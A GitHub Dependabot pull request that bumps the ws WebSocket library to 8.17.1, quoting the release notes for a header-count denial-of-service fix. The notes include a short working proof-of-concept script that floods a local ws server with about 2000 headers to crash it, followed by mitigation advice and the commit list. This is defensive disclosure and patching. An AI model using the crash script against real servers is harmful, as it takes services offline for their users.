Title: Bump ws from 8.13.0 to 8.17.1 in /NodeJS/1-npm by dependabot[bot] · Pull Request #3 · HowProgrammingWorks/Modularity · GitHub
Description: Bumps ws from 8.13.0 to 8.17.1.
Release notes
Sourced from ws's releases.
8.17.1
Bug fixes
Fixed a DoS vulnerability (#2231).
A request with a number of headers exceeding the `server.maxHeadersCount`
threshold could be used to crash a ws server.
```js
const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';
      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});
```
The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.
In vulnerable versions of ws, the issue can be mitigated in the following ways:
Reduce the maximum allowed length of the request headers using the
`--max-http-header-size=size` and/or the `maxHeaderSize` options so
that no more headers than the `server.maxHeadersCount` limit can be sent.
... (truncated)
Commits
3c56601 [dist] 8.17.1
e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
6a00029 [test] Increase code coverage
ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
b73b118 [dist] 8.17.0
29694a5 [test] Use the highWaterMark variable
934c9d6 [ci] Test on node 22
1817bac [ci] Do not test on node 21
96c9b3d [major] Flip the default value of allowSynchronousEvents (#2221)
e5f32c7 [fix] Emit at most one event per event loop iteration (#2218)
Additional commits viewable in compare view
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.
Dependabot commands and options
You can trigger Dependabot actions by commenting on this PR:
@dependabot rebase will rebase this PR
@dependabot recreate will recreate this PR, overwriting any edits that have been made to it
@dependabot merge will merge this PR after your CI passes on it
@dependabot squash and merge will squash and merge this PR after your CI passes on it
@dependabot cancel merge will cancel a previously requested merge and block automerging
@dependabot reopen will reopen this PR if it is closed
@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
@dependabot show
Opengraph URL: https://github.com/HowProgrammingWorks/Modularity/pull/3